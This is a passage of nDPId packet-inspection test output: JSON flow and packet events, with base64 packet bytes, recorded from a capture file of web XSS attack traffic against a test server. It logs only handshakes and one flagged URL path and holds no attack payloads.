-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7534,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":533,"flow_packet_id":2,"flow_last_seen":1499347873465,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347873465,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgzpjWOt2nfqlm6AScSC6ZwAAAgQFtAQCCAoD5i3vATxcewEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7536,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":533,"flow_packet_id":3,"flow_last_seen":1499347873466,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347873466,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0+eJAAD4Gy\/WsEAABwKgKMoM6AFCd+qWbY1jrd4AQAOVZbwAAAQEICgE8XHsD5i3v"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7545,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347874737,"flow_last_seen":1499347874737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874737,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33608,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7545,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":534,"flow_packet_id":1,"flow_last_seen":1499347874737,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347874737,"pkt":"ABm5CmnxAMGxFOsxCABFAAA88wxAAD4G0sOsEAABwKgKMoNIAFDgx661AAAAAKACchDs+AAAAgQFtAQCCAoBPF25AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7546,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":534,"flow_packet_id":2,"flow_last_seen":1499347874737,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347874737,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQg0iSQssc4MeutqAScSBdZQAAAgQFtAQCCAoD5i8tATxduQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7547,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":534,"flow_packet_id":3,"flow_last_seen":1499347874738,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347874738,"pkt":"ABm5CmnxAMGxFOsxCABFAAA08w1AAD4G0sqsEAABwKgKMoNIAFDgx662kkLLHYAQAOX8bAAAAQEICgE8XbkD5i8t"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347747187,"flow_last_seen":1499347752826,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60504,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347747187,"flow_last_seen":1499347752826,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347748472,"flow_last_seen":1499347753827,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60518,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347748472,"flow_last_seen":1499347753827,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60518,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347749751,"flow_last_seen":1499347754827,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60532,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347749751,"flow_last_seen":1499347754827,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60532,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347752308,"flow_last_seen":1499347757828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60558,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347752308,"flow_last_seen":1499347757828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60558,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347753649,"flow_last_seen":1499347758828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60572,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347753649,"flow_last_seen":1499347758828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60572,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7563,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347872187,"flow_last_seen":1499347877028,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347877028,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33580,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7567,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347877292,"flow_last_seen":1499347877292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347877292,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33634,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7567,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":535,"flow_packet_id":1,"flow_last_seen":1499347877292,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347877292,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8t4hAAD4GDkisEAABwKgKMoNiAFCEB9ewAAAAAKACchAeJQAAAgQFtAQCCAoBPGA4AAAAAAEDAwc="} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7568,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":535,"flow_packet_id":2,"flow_last_seen":1499347877292,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347877292,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQg2I\/o2nZhAfXsaAScSA\/9QAAAgQFtAQCCAoD5jGsATxgOAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7569,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":535,"flow_packet_id":3,"flow_last_seen":1499347877293,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347877293,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0t4lAAD4GDk+sEAABwKgKMoNiAFCEB9exP6Np2oAQAOXe\/AAAAQEICgE8YDgD5jGs"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347878568,"flow_last_seen":1499347878568,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347878568,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33648,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":536,"flow_packet_id":1,"flow_last_seen":1499347878568,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347878568,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UNxAAD4GdPSsEAABwKgKMoNwAFDv6DGrAAAAAKACchBW\/AAAAgQFtAQCCAoBPGF3AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7577,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":536,"flow_packet_id":2,"flow_last_seen":1499347878568,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347878568,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQg3Dm1iqC7+gxrKAScSAPsQAAAgQFtAQCCAoD5jLrATxhdwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7578,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":536,"flow_packet_id":3,"flow_last_seen":1499347878568,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347878568,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UN1AAD4GdPusEAABwKgKMoNwAFDv6DGs5tYqg4AQAOWuuAAAAQEICgE8YXcD5jLr"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7597,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347881141,"flow_last_seen":1499347881141,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347881141,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33674,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7597,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":537,"flow_packet_id":1,"flow_last_seen":1499347881141,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347881141,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80HhAAD4G9VesEAABwKgKMoOKAFDzHbOCAAAAAKACchDPUgAAAgQFtAQCCAoBPGP6AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7598,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":537,"flow_packet_id":2,"flow_last_seen":1499347881141,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347881141,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQg4pPHZMl8x2zg6AScSC0mgAAAgQFtAQCCAoD5jVuATxj+gEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7599,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":537,"flow_packet_id":3,"flow_last_seen":1499347881142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347881142,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00HlAAD4G9V6sEAABwKgKMoOKAFDzHbODTx2TJoAQAOVTogAAAQEICgE8Y\/oD5jVu"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7607,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347882404,"flow_last_seen":1499347882404,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347882404,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33688,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7607,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":538,"flow_packet_id":1,"flow_last_seen":1499347882404,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347882404,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8eWdAAD4GTGmsEAABwKgKMoOYAFA4phxRAAAAAKACchAfsgAAAgQFtAQCCAoBPGU2AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7608,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":538,"flow_packet_id":2,"flow_last_seen":1499347882404,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347882404,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQg5hCgWTIOKYcUqAScSA+twAAAgQFtAQCCAoD5jaqATxlNgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7609,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":538,"flow_packet_id":3,"flow_last_seen":1499347882404,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347882404,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0eWhAAD4GTHCsEAABwKgKMoOYAFA4phxSQoFkyYAQAOXdvgAAAQEICgE8ZTYD5jaq"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7618,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347883693,"flow_last_seen":1499347883693,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347883693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33702,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7618,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":539,"flow_packet_id":1,"flow_last_seen":1499347883693,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347883693,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8WYNAAD4GbE2sEAABwKgKMoOmAFDBWz\/7AAAAAKACchByAgAAAgQFtAQCCAoBPGZ4AAAAAAEDAwc="} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7619,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":539,"flow_packet_id":2,"flow_last_seen":1499347883693,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347883693,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQg6YJ\/gJMwVs\/\/KAScSAqxQAAAgQFtAQCCAoD5jfsATxmeAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":539,"flow_packet_id":3,"flow_last_seen":1499347883694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347883694,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0WYRAAD4GbFSsEAABwKgKMoOmAFDBWz\/8Cf4CTYAQAOXJzAAAAQEICgE8ZngD5jfs"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347756244,"flow_last_seen":1499347761829,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347885019,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60598,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347756244,"flow_last_seen":1499347761829,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347885019,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60598,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347757502,"flow_last_seen":1499347762829,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347885019,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60612,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347757502,"flow_last_seen":1499347762829,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347885019,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60612,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347758774,"flow_last_seen":1499347763831,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347885019,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60626,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347758774,"flow_last_seen":1499347763831,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347885019,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60626,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347761418,"flow_last_seen":1499347766830,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347885019,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60652,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347761418,"flow_last_seen":1499347766830,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347885019,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60652,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347762675,"flow_last_seen":1499347767831,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347885019,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60666,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 